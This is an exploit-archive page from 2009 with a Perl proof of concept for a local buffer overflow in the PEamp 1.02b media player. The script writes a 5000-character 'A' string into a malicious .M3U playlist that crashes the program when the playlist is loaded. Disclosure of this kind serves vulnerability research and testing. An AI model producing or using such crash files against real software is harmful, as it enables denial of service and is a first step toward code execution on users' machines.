[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PEamp 1.02b (.M3U File) Local Buffer Overflow PoC
# Published : 2009-07-01
# Author : ThE g0bL!N
# Previous Title : ARD-9808 DVR Card Security Camera (GET Request) Remote DoS Exploit
# Next Title : VideoLAN VLC Media Player 0.9.9 smb:// URI Stack BOF PoC


# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# #   PEamp 1.02b  (.M3U File) Local Stack Overflow POC                        ##
# #  Download: http://files.brothersoft.com/mp3_audio/players/mp3player.zip    ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $chars= "A" x 5000;
my $file="dz.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created n";
# usage: amp.exe=> load playlist => dz.m3u => Boom !!! :)

# www.Syue.com [2009-07-01]